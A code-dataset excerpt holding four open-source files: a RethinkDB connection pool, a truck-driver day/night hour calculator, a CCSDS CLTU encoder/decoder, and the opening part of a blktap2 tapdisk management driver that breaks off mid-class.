repo_name
stringlengths 5
92
| path
stringlengths 4
232
| copies
stringclasses 19
values | size
stringlengths 4
7
| content
stringlengths 721
1.04M
| license
stringclasses 15
values | hash
int64 -9,223,277,421,539,062,000
9,223,102,107B
| line_mean
float64 6.51
99.9
| line_max
int64 15
997
| alpha_frac
float64 0.25
0.97
| autogenerated
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|
lucidfrontier45/RethinkPool | rethinkpool/__init__.py | 1 | 2195 | from __future__ import absolute_import
from logging import getLogger
import rethinkdb as r
from future.builtins import range
from future.moves.queue import Queue
logger = getLogger("RethinkPool")
class ConnectionResource(object):
def __init__(self, queue, conn, **kwds):
self._queue = queue
if conn:
self._conn = conn
else:
self._conn = r.connect(**kwds)
@property
def conn(self):
return self._conn
def release(self):
if self._conn:
logger.info("release a connection")
self._queue.put_nowait(self._conn)
self._conn = None
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.release()
def __del__(self):
self.release()
class RethinkPool(object):
def __init__(self, max_conns=10, initial_conns=0, get_timeout=10, **kwds):
"""
:param max_conns: maximum number of connections
:param initial_conns: number of connections to be initially establish
:param get_timeout: timeout for obtaining a connection from the queue
:param host, port, ...: same as r.connect
"""
self._current_conns = 0
self.get_timeout = get_timeout
self._connection_info = kwds
self._queue = Queue(max_conns)
for _ in range(min(max_conns, min(initial_conns, max_conns))):
self._queue.put(self._create_connection())
def _create_connection(self):
conn = r.connect(**self._connection_info)
self._current_conns += 1
return conn
@property
def current_conns(self):
return self._current_conns
def get_resource(self):
"""
obtain a connection resource from the queue
:return: ConnectionResource object
"""
if self._queue.empty() and self.current_conns < self._queue.maxsize:
logger.info("create a new connection")
conn = self._create_connection()
else:
logger.info("reuse a connection")
conn = self._queue.get(True, self.get_timeout)
return ConnectionResource(self._queue, conn)
| apache-2.0 | 2,460,425,041,709,897,700 | 26.4375 | 78 | 0.596355 | false |
dynamikdev/transportutils | transportutils/driver.py | 1 | 2790 | """
Tools for calculate hours/periods of a Truck's driver
Actually only valable in France
"""
from datetime import timedelta
from dateutil import rrule
import pytz
# GMT = pytz.timezone('UTC')
# fr = pytz.timezone('Europe/Paris')
ENDNIGHT = 6
STARTNIGHT = 21
class DriverDaysDates(object):
"""
"""
def __init__(self,startOfDay,endOfDay):
self.startOfDay = startOfDay
self.endOfDay = endOfDay
self.daytimedelta = self.nighttimedelta = timedelta()
self.change = list(rrule.rrule(rrule.DAILY,
byhour=(ENDNIGHT,STARTNIGHT),
byminute=0,
bysecond=0,
dtstart=startOfDay,
until=endOfDay))
if len(list(self.change))==0 :
#there no changing type
if len(list(rrule.rrule(rrule.DAILY,
byhour=0,
byminute=0,
bysecond=0,
dtstart=self.startOfDay,
until=self.endOfDay)))>0 or self.startOfDay.hour> STARTNIGHT or self.startOfDay.hour> ENDNIGHT :
#there is midnight or start is in night so everything is nigth
self.nighttimedelta = abs(self.endOfDay -self.startOfDay)
self.daytimedelta = timedelta()
else:
#overwise is a day
self.nighttimedelta = timedelta()
self.daytimedelta = abs(self.endOfDay -self.startOfDay)
else:
self.calcthedelta()
def calcthedelta(self):
lstdate = [self.startOfDay] + list(self.change) + [self.endOfDay]
# print lstdate
for k in range(1, len(lstdate)):
# print k,lstdate[k-1],lstdate[k]
isNight = False
if lstdate[k-1] in self.change: #start from a change
if lstdate[k-1].hour == STARTNIGHT:
isNight = True
if lstdate[k] in self.change: #start from a change
if lstdate[k].hour == ENDNIGHT:
isNight = True
if isNight:
self.nighttimedelta += abs(lstdate[k] - lstdate[k-1])
else:
self.daytimedelta += abs(lstdate[k] - lstdate[k-1])
class DriverDates(object):
"""
"""
DriverTimeZone = pytz.timezone('Europe/Paris')
def __init__(self, datedeb, datefin):
self.datedeb = datedeb.astimezone(self.DriverTimeZone)
self.datefin = datefin.astimezone(self.DriverTimeZone)
lstdate = [self.datedeb] + \
list(rrule.rrule(rrule.DAILY,
byhour=0,
byminute=0,
bysecond=0,
dtstart=self.datedeb,
until=self.datefin)) +\
[self.datefin]
self.days = [DriverDaysDates(lstdate[k-1], lstdate[k]) for k in range(1, len(lstdate))]
| gpl-2.0 | -3,237,510,786,302,446,000 | 33.02439 | 108 | 0.567384 | false |
Stefan-Korner/SpacePyLibrary | CCSDS/CLTU.py | 1 | 6692 | #******************************************************************************
# (C) 2018, Stefan Korner, Austria *
# *
# The Space Python Library is free software; you can redistribute it and/or *
# modify it under under the terms of the MIT License as published by the *
# Massachusetts Institute of Technology. *
# *
# The Space Python Library is distributed in the hope that it will be useful, *
# but WITHOUT ANY WARRANTY; without even the implied warranty of *
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the MIT License *
# for more details. *
#******************************************************************************
# CCSDS Stack - CLTU Handling Module *
#******************************************************************************
import array
import UTIL.BCH
#############
# constants #
#############
# CLTU header
CLTU_START_SEQUENCE = [0xEB, 0x90]
CLTU_START_SEQUENCE_SIZE = len(CLTU_START_SEQUENCE)
# fill bytes for last code block
CLTU_FILL_BYTE = 0x55
# compliant with SCOS-2000
CLTU_TRAILER_SEQUENCE = [0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55]
# compliant with CCSDS specification
#CLTU_TRAILER_SEQUENCE = [0xC5, 0xC5, 0xC5, 0xC5, 0xC5, 0xC5, 0xC5, 0x79]
CLTU_TRAILER_SEQUENCE_SIZE = len(CLTU_TRAILER_SEQUENCE)
# derived constants
BCH_NETTO_SIZE = UTIL.BCH.CODE_BLOCK_SIZE - 1
BCH_MAX_NETTO_INDEX = BCH_NETTO_SIZE - 1
#############
# functions #
#############
# -----------------------------------------------------------------------------
def encodeCltu(frame):
"""Converts a TC Frame into a CLTU"""
# iterate over the frame bytes, which are copied
# into the CLTU body together with BCH code bytes
frameIdx = 0
frameSize = len(frame)
nrCltuCodeBlocks = (frameSize + BCH_MAX_NETTO_INDEX) // BCH_NETTO_SIZE
cltuBodySize = nrCltuCodeBlocks * UTIL.BCH.CODE_BLOCK_SIZE
cltuBody = array.array("B", [0] * cltuBodySize)
cltuBodyIdx = 0
codeBlkIdx = 0
while frameIdx < frameSize:
# handle start of a code block
if codeBlkIdx == 0:
sreg = UTIL.BCH.encodeStart()
# take the next byte from the frame for the CLTU and the BCH encoding
nextByte = frame[frameIdx]
cltuBody[cltuBodyIdx] = nextByte
sreg = UTIL.BCH.encodeStep(sreg, nextByte)
frameIdx += 1
cltuBodyIdx += 1
codeBlkIdx += 1
# handle end of a code block
if codeBlkIdx >= BCH_NETTO_SIZE:
code = UTIL.BCH.encodeStop(sreg)
cltuBody[cltuBodyIdx] = code
cltuBodyIdx += 1
codeBlkIdx = 0
# fill up remaining bytes in the cltuBody (incl. BCH code byte)
while cltuBodyIdx < cltuBodySize:
nextByte = CLTU_FILL_BYTE
cltuBody[cltuBodyIdx] = nextByte
sreg = UTIL.BCH.encodeStep(sreg, nextByte)
cltuBodyIdx += 1
codeBlkIdx += 1
# handle end of the code block
if codeBlkIdx >= BCH_NETTO_SIZE:
code = UTIL.BCH.encodeStop(sreg)
cltuBody[cltuBodyIdx] = code
cltuBodyIdx += 1
# CLTU body is completely processed
return (array.array("B", CLTU_START_SEQUENCE) +
cltuBody +
array.array("B", CLTU_TRAILER_SEQUENCE))
# -----------------------------------------------------------------------------
def decodeCltu(cltu):
"""Converts a CLTU into a TC Frame"""
# Note: the returned frame might contain additional fill bytes,
# these bytes must be removed at the frame layer
# calculate the frame size from the CLTU size
cltuSize = len(cltu)
cltuBodySize = cltuSize - CLTU_START_SEQUENCE_SIZE - CLTU_TRAILER_SEQUENCE_SIZE
# check general CLTU properties
if cltuBodySize < 0:
return None
if cltuBodySize % UTIL.BCH.CODE_BLOCK_SIZE != 0:
return None
if cltu[:CLTU_START_SEQUENCE_SIZE] != array.array("B", CLTU_START_SEQUENCE):
return None
if cltu[-CLTU_TRAILER_SEQUENCE_SIZE:] != array.array("B", CLTU_TRAILER_SEQUENCE):
return None
# iterate over the CLTU body bytes, which are copied
# into the frame, BCH code is checked during the iteration
nrCltuCodeBlocks = cltuBodySize // UTIL.BCH.CODE_BLOCK_SIZE
frameSize = nrCltuCodeBlocks * BCH_NETTO_SIZE
frame = array.array("B", [0] * frameSize)
frameIdx = 0
cltuIdx = CLTU_START_SEQUENCE_SIZE
codeBlkIdx = 0
while frameIdx < frameSize:
# handle start of a code block
if codeBlkIdx == 0:
sreg = UTIL.BCH.encodeStart()
# take the next byte from the CLTU for the frame and the BCH decoding
nextByte = cltu[cltuIdx]
frame[frameIdx] = nextByte
sreg = UTIL.BCH.encodeStep(sreg, nextByte)
frameIdx += 1
cltuIdx += 1
codeBlkIdx += 1
# handle end of a code block
if codeBlkIdx >= BCH_NETTO_SIZE:
code = UTIL.BCH.encodeStop(sreg)
if cltu[cltuIdx] != code:
return None
cltuIdx += 1
codeBlkIdx = 0
return frame
# -----------------------------------------------------------------------------
def checkCltu(cltu):
"""Checks the consistency of a CLTU"""
# calculate the frame size from the CLTU size
cltuSize = len(cltu)
cltuTrailerStartIdx = cltuSize - CLTU_TRAILER_SEQUENCE_SIZE
cltuBodySize = cltuTrailerStartIdx - CLTU_START_SEQUENCE_SIZE
# check general CLTU properties
if cltuBodySize < 0:
return False, "cltuBodySize too short"
if cltuBodySize % UTIL.BCH.CODE_BLOCK_SIZE != 0:
return False, "wrong cltuBodySize"
for i in range(0, CLTU_START_SEQUENCE_SIZE):
if cltu[i] != CLTU_START_SEQUENCE[i]:
return False, "wrong cltu start sequence"
for i in range(-CLTU_TRAILER_SEQUENCE_SIZE, 0):
if cltu[i] != CLTU_TRAILER_SEQUENCE[i]:
return False, "wrong cltu trailer sequence"
# iterate over the CLTU body bytes and check the BCH code
nrCltuCodeBlocks = cltuBodySize // UTIL.BCH.CODE_BLOCK_SIZE
frameSize = nrCltuCodeBlocks * BCH_NETTO_SIZE
cltuIdx = CLTU_START_SEQUENCE_SIZE
codeBlkIdx = 0
while cltuIdx < cltuTrailerStartIdx:
# handle start of a code block
if codeBlkIdx == 0:
sreg = UTIL.BCH.encodeStart()
# take the next byte from the CLTU for the frame and the BCH decoding
nextByte = cltu[cltuIdx]
sreg = UTIL.BCH.encodeStep(sreg, nextByte)
cltuIdx += 1
codeBlkIdx += 1
# handle end of a code block
if codeBlkIdx >= BCH_NETTO_SIZE:
code = UTIL.BCH.encodeStop(sreg)
if cltu[cltuIdx] != code:
return False, "wrong BCH check byte"
cltuIdx += 1
codeBlkIdx = 0
return True, "cltu OK"
| mit | -4,633,000,611,466,024,000 | 39.313253 | 83 | 0.59997 | false |
chandrikas/sm | drivers/blktap2.py | 1 | 90416 | #!/usr/bin/env python
#
# Copyright (C) Citrix Systems Inc.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation; version 2.1 only.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
# blktap2: blktap/tapdisk management layer
#
import os
import sys
import re
import time
import copy
from lock import Lock
import util
import xmlrpclib
import httplib
import errno
import subprocess
import syslog as _syslog
import glob
import json
import xs_errors
import XenAPI
import scsiutil
from syslog import openlog, syslog
from stat import * # S_ISBLK(), ...
import nfs
import resetvdis
import vhdutil
import lvhdutil
# For RRDD Plugin Registration
from xmlrpclib import ServerProxy, Transport
from socket import socket, AF_UNIX, SOCK_STREAM
from httplib import HTTP, HTTPConnection
PLUGIN_TAP_PAUSE = "tapdisk-pause"
SOCKPATH = "/var/xapi/xcp-rrdd"
NUM_PAGES_PER_RING = 32 * 11
MAX_FULL_RINGS = 8
POOL_NAME_KEY = "mem-pool"
POOL_SIZE_KEY = "mem-pool-size-rings"
ENABLE_MULTIPLE_ATTACH = "/etc/xensource/allow_multiple_vdi_attach"
NO_MULTIPLE_ATTACH = not (os.path.exists(ENABLE_MULTIPLE_ATTACH))
class UnixStreamHTTPConnection(HTTPConnection):
def connect(self):
self.sock = socket(AF_UNIX, SOCK_STREAM)
self.sock.connect(SOCKPATH)
class UnixStreamHTTP(HTTP):
_connection_class = UnixStreamHTTPConnection
class UnixStreamTransport(Transport):
def make_connection(self, host):
return UnixStreamHTTP(SOCKPATH) # overridden, but prevents IndexError
def locking(excType, override=True):
def locking2(op):
def wrapper(self, *args):
self.lock.acquire()
try:
try:
ret = op(self, *args)
except (util.CommandException, util.SMException, XenAPI.Failure), e:
util.logException("BLKTAP2:%s" % op)
msg = str(e)
if isinstance(e, util.CommandException):
msg = "Command %s failed (%s): %s" % \
(e.cmd, e.code, e.reason)
if override:
raise xs_errors.XenError(excType, opterr=msg)
else:
raise
except:
util.logException("BLKTAP2:%s" % op)
raise
finally:
self.lock.release()
return ret
return wrapper
return locking2
class RetryLoop(object):
def __init__(self, backoff, limit):
self.backoff = backoff
self.limit = limit
def __call__(self, f):
def loop(*__t, **__d):
attempt = 0
while True:
attempt += 1
try:
return f(*__t, **__d)
except self.TransientFailure, e:
e = e.exception
if attempt >= self.limit: raise e
time.sleep(self.backoff)
return loop
class TransientFailure(Exception):
def __init__(self, exception):
self.exception = exception
def retried(**args): return RetryLoop(**args)
class TapCtl(object):
"""Tapdisk IPC utility calls."""
PATH = "/usr/sbin/tap-ctl"
def __init__(self, cmd, p):
self.cmd = cmd
self._p = p
self.stdout = p.stdout
class CommandFailure(Exception):
"""TapCtl cmd failure."""
def __init__(self, cmd, **info):
self.cmd = cmd
self.info = info
def __str__(self):
items = self.info.iteritems()
info = ", ".join("%s=%s" % item
for item in items)
return "%s failed: %s" % (self.cmd, info)
# Trying to get a non-existent attribute throws an AttributeError
# exception
def __getattr__(self, key):
if self.info.has_key(key): return self.info[key]
return object.__getattribute__(self, key)
# Retrieves the error code returned by the command. If the error code
# was not supplied at object-construction time, zero is returned.
def get_error_code(self):
key = 'status'
if self.info.has_key(key):
return self.info[key]
else:
return 0
@classmethod
def __mkcmd_real(cls, args):
return [ cls.PATH ] + map(str, args)
__next_mkcmd = __mkcmd_real
@classmethod
def _mkcmd(cls, args):
__next_mkcmd = cls.__next_mkcmd
cls.__next_mkcmd = cls.__mkcmd_real
return __next_mkcmd(args)
@classmethod
def failwith(cls, status, prev=False):
"""
Fail next invocation with @status. If @prev is true, execute
the original command
"""
__prev_mkcmd = cls.__next_mkcmd
@classmethod
def __mkcmd(cls, args):
if prev:
cmd = __prev_mkcmd(args)
cmd = "'%s' && exit %d" % ("' '".join(cmd), status)
else:
cmd = "exit %d" % status
return [ '/bin/sh', '-c', cmd ]
cls.__next_mkcmd = __mkcmd
__strace_n = 0
@classmethod
def strace(cls):
"""
Run next invocation through strace.
Output goes to /tmp/tap-ctl.<sm-pid>.<n>; <n> counts invocations.
"""
__prev_mkcmd = cls.__next_mkcmd
@classmethod
def __next_mkcmd(cls, args):
# pylint: disable = E1101
cmd = __prev_mkcmd(args)
tracefile = "/tmp/%s.%d.%d" % (os.path.basename(cls.PATH),
os.getpid(),
cls.__strace_n)
cls.__strace_n += 1
return \
[ '/usr/bin/strace', '-o', tracefile, '--'] + cmd
cls.__next_mkcmd = __next_mkcmd
@classmethod
def _call(cls, args, quiet = False, input = None):
"""
Spawn a tap-ctl process. Return a TapCtl invocation.
Raises a TapCtl.CommandFailure if subprocess creation failed.
"""
cmd = cls._mkcmd(args)
if not quiet:
util.SMlog(cmd)
try:
p = subprocess.Popen(cmd,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
if input:
p.stdin.write(input)
p.stdin.close()
except OSError, e:
raise cls.CommandFailure(cmd, errno=e.errno)
return cls(cmd, p)
def _errmsg(self):
output = map(str.rstrip, self._p.stderr)
return "; ".join(output)
def _wait(self, quiet = False):
"""
Reap the child tap-ctl process of this invocation.
Raises a TapCtl.CommandFailure on non-zero exit status.
"""
status = self._p.wait()
if not quiet:
util.SMlog(" = %d" % status)
if status == 0: return
info = { 'errmsg' : self._errmsg(),
'pid' : self._p.pid }
if status < 0:
info['signal'] = -status
else:
info['status'] = status
raise self.CommandFailure(self.cmd, **info)
@classmethod
def _pread(cls, args, quiet = False, input = None):
"""
Spawn a tap-ctl invocation and read a single line.
"""
tapctl = cls._call(args=args, quiet=quiet, input=input)
output = tapctl.stdout.readline().rstrip()
tapctl._wait(quiet)
return output
@staticmethod
def _maybe(opt, parm):
if parm is not None: return [ opt, parm ]
return []
@classmethod
def __list(cls, minor = None, pid = None, _type = None, path = None):
args = [ "list" ]
args += cls._maybe("-m", minor)
args += cls._maybe("-p", pid)
args += cls._maybe("-t", _type)
args += cls._maybe("-f", path)
tapctl = cls._call(args, True)
for line in tapctl.stdout:
# FIXME: tap-ctl writes error messages to stdout and
# confuses this parser
if line == "blktap kernel module not installed\n":
# This isn't pretty but (a) neither is confusing stdout/stderr
# and at least causes the error to describe the fix
raise Exception, "blktap kernel module not installed: try 'modprobe blktap'"
row = {}
for field in line.rstrip().split(' ', 3):
bits = field.split('=')
if len(bits) == 2:
key, val = field.split('=')
if key in ('pid', 'minor'):
row[key] = int(val, 10)
elif key in ('state'):
row[key] = int(val, 0x10)
else:
row[key] = val
else:
util.SMlog("Ignoring unexpected tap-ctl output: %s" % repr(field))
yield row
tapctl._wait(True)
@classmethod
@retried(backoff=.5, limit=10)
def list(cls, **args):
# FIXME. We typically get an EPROTO when uevents interleave
# with SM ops and a tapdisk shuts down under our feet. Should
# be fixed in SM.
try:
return list(cls.__list(**args))
except cls.CommandFailure, e:
transient = [ errno.EPROTO, errno.ENOENT ]
if e.status in transient:
raise RetryLoop.TransientFailure(e)
raise
@classmethod
def allocate(cls, devpath = None):
args = [ "allocate" ]
args += cls._maybe("-d", devpath)
return cls._pread(args)
@classmethod
def free(cls, minor):
args = [ "free", "-m", minor ]
cls._pread(args)
@classmethod
@retried(backoff=.5, limit=10)
def spawn(cls):
args = [ "spawn" ]
try:
pid = cls._pread(args)
return int(pid)
except cls.CommandFailure as ce:
# intermittent failures to spawn. CA-292268
if ce.status == 1:
raise RetryLoop.TransientFailure(ce)
raise
@classmethod
def attach(cls, pid, minor):
args = [ "attach", "-p", pid, "-m", minor ]
cls._pread(args)
@classmethod
def detach(cls, pid, minor):
args = [ "detach", "-p", pid, "-m", minor ]
cls._pread(args)
@classmethod
def open(cls, pid, minor, _type, _file, options):
params = Tapdisk.Arg(_type, _file)
args = [ "open", "-p", pid, "-m", minor, '-a', str(params) ]
input = None
if options.get("rdonly"):
args.append('-R')
if options.get("lcache"):
args.append("-r")
if options.get("existing_prt") != None:
args.append("-e")
args.append(str(options["existing_prt"]))
if options.get("secondary"):
args.append("-2")
args.append(options["secondary"])
if options.get("standby"):
args.append("-s")
if options.get("timeout"):
args.append("-t")
args.append(str(options["timeout"]))
if not options.get("o_direct", True):
args.append("-D")
if options.get('cbtlog'):
args.extend(['-C', options['cbtlog']])
if options.get('key_hash'):
import plugins
key_hash = options['key_hash']
vdi_uuid = options['vdi_uuid']
key = plugins.load_key(key_hash, vdi_uuid)
if not key:
raise util.SMException("No key found with key hash {}".format(key_hash))
input = key
args.append('-E')
cls._pread(args=args, input=input)
@classmethod
def close(cls, pid, minor, force = False):
args = [ "close", "-p", pid, "-m", minor ]
if force: args += [ "-f" ]
cls._pread(args)
@classmethod
def pause(cls, pid, minor):
args = [ "pause", "-p", pid, "-m", minor ]
cls._pread(args)
@classmethod
def unpause(cls, pid, minor, _type = None, _file = None, mirror = None,
cbtlog = None):
args = [ "unpause", "-p", pid, "-m", minor ]
if mirror:
args.extend(["-2", mirror])
if _type and _file:
params = Tapdisk.Arg(_type, _file)
args += [ "-a", str(params) ]
if cbtlog:
args.extend(["-c", cbtlog])
cls._pread(args)
@classmethod
def stats(cls, pid, minor):
args = [ "stats", "-p", pid, "-m", minor ]
return cls._pread(args, quiet = True)
@classmethod
def major(cls):
args = [ "major" ]
major = cls._pread(args)
return int(major)
class TapdiskExists(Exception):
"""Tapdisk already running."""
def __init__(self, tapdisk):
self.tapdisk = tapdisk
def __str__(self):
return "%s already running" % self.tapdisk
class TapdiskNotRunning(Exception):
"""No such Tapdisk."""
def __init__(self, **attrs):
self.attrs = attrs
def __str__(self):
items = self.attrs.iteritems()
attrs = ", ".join("%s=%s" % attr
for attr in items)
return "No such Tapdisk(%s)" % attrs
class TapdiskNotUnique(Exception):
"""More than one tapdisk on one path."""
def __init__(self, tapdisks):
self.tapdisks = tapdisks
def __str__(self):
tapdisks = map(str, self.tapdisks)
return "Found multiple tapdisks: %s" % tapdisks
class TapdiskFailed(Exception):
"""Tapdisk launch failure."""
def __init__(self, arg, err):
self.arg = arg
self.err = err
def __str__(self):
return "Tapdisk(%s): %s" % (self.arg, self.err)
def get_error(self):
return self.err
class TapdiskInvalidState(Exception):
"""Tapdisk pause/unpause failure"""
def __init__(self, tapdisk):
self.tapdisk = tapdisk
def __str__(self):
return str(self.tapdisk)
def mkdirs(path, mode=0777):
if not os.path.exists(path):
parent, subdir = os.path.split(path)
assert parent != path
try:
if parent:
mkdirs(parent, mode)
if subdir:
os.mkdir(path, mode)
except OSError, e:
if e.errno != errno.EEXIST:
raise
class KObject(object):
SYSFS_CLASSTYPE = None
def sysfs_devname(self):
raise NotImplementedError("sysfs_devname is undefined")
class Attribute(object):
SYSFS_NODENAME = None
def __init__(self, path):
self.path = path
@classmethod
def from_kobject(cls, kobj):
path = "%s/%s" % (kobj.sysfs_path(), cls.SYSFS_NODENAME)
return cls(path)
class NoSuchAttribute(Exception):
def __init__(self, name):
self.name = name
def __str__(self):
return "No such attribute: %s" % self.name
def _open(self, mode='r'):
try:
return file(self.path, mode)
except IOError, e:
if e.errno == errno.ENOENT:
raise self.NoSuchAttribute(self)
raise
def readline(self):
f = self._open('r')
s = f.readline().rstrip()
f.close()
return s
def writeline(self, val):
f = self._open('w')
f.write(val)
f.close()
class ClassDevice(KObject):
@classmethod
def sysfs_class_path(cls):
return "/sys/class/%s" % cls.SYSFS_CLASSTYPE
def sysfs_path(self):
return "%s/%s" % (self.sysfs_class_path(),
self.sysfs_devname())
class Blktap(ClassDevice):
DEV_BASEDIR = '/dev/xen/blktap-2'
SYSFS_CLASSTYPE = "blktap2"
def __init__(self, minor):
self.minor = minor
self._pool = None
self._task = None
@classmethod
def allocate(cls):
# FIXME. Should rather go into init.
mkdirs(cls.DEV_BASEDIR)
devname = TapCtl.allocate()
minor = Tapdisk._parse_minor(devname)
return cls(minor)
def free(self):
TapCtl.free(self.minor)
def __str__(self):
return "%s(minor=%d)" % (self.__class__.__name__, self.minor)
def sysfs_devname(self):
return "blktap!blktap%d" % self.minor
class Pool(Attribute):
SYSFS_NODENAME = "pool"
def get_pool_attr(self):
if not self._pool:
self._pool = self.Pool.from_kobject(self)
return self._pool
def get_pool_name(self):
return self.get_pool_attr().readline()
def set_pool_name(self, name):
self.get_pool_attr().writeline(name)
def set_pool_size(self, pages):
self.get_pool().set_size(pages)
def get_pool(self):
return BlktapControl.get_pool(self.get_pool_name())
def set_pool(self, pool):
self.set_pool_name(pool.name)
class Task(Attribute):
SYSFS_NODENAME = "task"
def get_task_attr(self):
if not self._task:
self._task = self.Task.from_kobject(self)
return self._task
def get_task_pid(self):
pid = self.get_task_attr().readline()
try:
return int(pid)
except ValueError:
return None
def find_tapdisk(self):
pid = self.get_task_pid()
if pid is None: return None
return Tapdisk.find(pid=pid, minor=self.minor)
def get_tapdisk(self):
tapdisk = self.find_tapdisk()
if not tapdisk:
raise TapdiskNotRunning(minor=self.minor)
return tapdisk
class Tapdisk(object):
TYPES = [ 'aio', 'vhd' ]
def __init__(self, pid, minor, _type, path, state):
self.pid = pid
self.minor = minor
self.type = _type
self.path = path
self.state = state
self._dirty = False
self._blktap = None
def __str__(self):
state = self.pause_state()
return "Tapdisk(%s, pid=%d, minor=%s, state=%s)" % \
(self.get_arg(), self.pid, self.minor, state)
@classmethod
def list(cls, **args):
for row in TapCtl.list(**args):
args = { 'pid' : None,
'minor' : None,
'state' : None,
'_type' : None,
'path' : None }
for key, val in row.iteritems():
if key in args:
args[key] = val
if 'args' in row:
image = Tapdisk.Arg.parse(row['args'])
args['_type'] = image.type
args['path'] = image.path
if None in args.values():
continue
yield Tapdisk(**args)
@classmethod
def find(cls, **args):
found = list(cls.list(**args))
if len(found) > 1:
raise TapdiskNotUnique(found)
if found:
return found[0]
return None
@classmethod
def find_by_path(cls, path):
return cls.find(path=path)
@classmethod
def find_by_minor(cls, minor):
return cls.find(minor=minor)
@classmethod
def get(cls, **attrs):
tapdisk = cls.find(**attrs)
if not tapdisk:
raise TapdiskNotRunning(**attrs)
return tapdisk
@classmethod
def from_path(cls, path):
return cls.get(path=path)
@classmethod
def from_minor(cls, minor):
return cls.get(minor=minor)
@classmethod
def __from_blktap(cls, blktap):
tapdisk = cls.from_minor(minor=blktap.minor)
tapdisk._blktap = blktap
return tapdisk
def get_blktap(self):
if not self._blktap:
self._blktap = Blktap(self.minor)
return self._blktap
class Arg:
def __init__(self, _type, path):
self.type = _type
self.path = path
def __str__(self):
return "%s:%s" % (self.type, self.path)
@classmethod
def parse(cls, arg):
try:
_type, path = arg.split(":", 1)
except ValueError:
raise cls.InvalidArgument(arg)
if _type not in Tapdisk.TYPES:
raise cls.InvalidType(_type)
return cls(_type, path)
class InvalidType(Exception):
def __init__(self, _type):
self.type = _type
def __str__(self):
return "Not a Tapdisk type: %s" % self.type
class InvalidArgument(Exception):
def __init__(self, arg):
self.arg = arg
def __str__(self):
return "Not a Tapdisk image: %s" % self.arg
def get_arg(self):
return self.Arg(self.type, self.path)
def get_devpath(self):
return "%s/tapdev%d" % (Blktap.DEV_BASEDIR, self.minor)
@classmethod
def launch_from_arg(cls, arg):
arg = cls.Arg.parse(arg)
return cls.launch(arg.path, arg.type, False)
@classmethod
def launch_on_tap(cls, blktap, path, _type, options):
tapdisk = cls.find_by_path(path)
if tapdisk:
raise TapdiskExists(tapdisk)
minor = blktap.minor
try:
pid = TapCtl.spawn()
try:
TapCtl.attach(pid, minor)
try:
TapCtl.open(pid, minor, _type, path, options)
try:
tapdisk = cls.__from_blktap(blktap)
node = '/sys/dev/block/%d:%d' % (tapdisk.major(), tapdisk.minor)
util.set_scheduler_sysfs_node(node, 'noop')
return tapdisk
except:
TapCtl.close(pid, minor)
raise
except:
TapCtl.detach(pid, minor)
raise
except:
exc_info = sys.exc_info()
# FIXME: Should be tap-ctl shutdown.
try:
import signal
os.kill(pid, signal.SIGTERM)
os.waitpid(pid, 0)
finally:
raise exc_info[0], exc_info[1], exc_info[2]
except TapCtl.CommandFailure, ctl:
util.logException(ctl)
if ('/dev/xapi/cd/' in path and
'status' in ctl.info and
ctl.info['status'] == 123): # ENOMEDIUM (No medium found)
raise xs_errors.XenError('TapdiskDriveEmpty')
else:
raise TapdiskFailed(cls.Arg(_type, path), ctl)
@classmethod
def launch(cls, path, _type, rdonly):
blktap = Blktap.allocate()
try:
return cls.launch_on_tap(blktap, path, _type, {"rdonly": rdonly})
except:
blktap.free()
raise
def shutdown(self, force = False):
TapCtl.close(self.pid, self.minor, force)
TapCtl.detach(self.pid, self.minor)
self.get_blktap().free()
def pause(self):
if not self.is_running():
raise TapdiskInvalidState(self)
TapCtl.pause(self.pid, self.minor)
self._set_dirty()
def unpause(self, _type=None, path=None, mirror=None, cbtlog = None):
if not self.is_paused():
raise TapdiskInvalidState(self)
# FIXME: should the arguments be optional?
if _type is None: _type = self.type
if path is None: path = self.path
TapCtl.unpause(self.pid, self.minor, _type, path, mirror=mirror,
cbtlog=cbtlog)
self._set_dirty()
def stats(self):
return json.loads(TapCtl.stats(self.pid, self.minor))
#
# NB. dirty/refresh: reload attributes on next access
#
def _set_dirty(self):
self._dirty = True
def _refresh(self, __get):
t = self.from_minor(__get('minor'))
self.__init__(t.pid, t.minor, t.type, t.path, t.state)
def __getattribute__(self, name):
def __get(name):
# NB. avoid(rec(ursion)
return object.__getattribute__(self, name)
if __get('_dirty') and \
name in ['minor', 'type', 'path', 'state']:
self._refresh(__get)
self._dirty = False
return __get(name)
class PauseState:
RUNNING = 'R'
PAUSING = 'r'
PAUSED = 'P'
class Flags:
DEAD = 0x0001
CLOSED = 0x0002
QUIESCE_REQUESTED = 0x0004
QUIESCED = 0x0008
PAUSE_REQUESTED = 0x0010
PAUSED = 0x0020
SHUTDOWN_REQUESTED = 0x0040
LOCKING = 0x0080
RETRY_NEEDED = 0x0100
LOG_DROPPED = 0x0200
PAUSE_MASK = PAUSE_REQUESTED|PAUSED
def is_paused(self):
return not not (self.state & self.Flags.PAUSED)
def is_running(self):
return not (self.state & self.Flags.PAUSE_MASK)
def pause_state(self):
if self.state & self.Flags.PAUSED:
return self.PauseState.PAUSED
if self.state & self.Flags.PAUSE_REQUESTED:
return self.PauseState.PAUSING
return self.PauseState.RUNNING
@staticmethod
def _parse_minor(devpath):
regex = '%s/(blktap|tapdev)(\d+)$' % Blktap.DEV_BASEDIR
pattern = re.compile(regex)
groups = pattern.search(devpath)
if not groups:
raise Exception, \
"malformed tap device: '%s' (%s) " % (devpath, regex)
minor = groups.group(2)
return int(minor)
_major = None
@classmethod
def major(cls):
if cls._major: return cls._major
devices = file("/proc/devices")
for line in devices:
row = line.rstrip().split(' ')
if len(row) != 2: continue
major, name = row
if name != 'tapdev': continue
cls._major = int(major)
break
devices.close()
return cls._major
class VDI(object):
"""SR.vdi driver decorator for blktap2"""
CONF_KEY_ALLOW_CACHING = "vdi_allow_caching"
CONF_KEY_MODE_ON_BOOT = "vdi_on_boot"
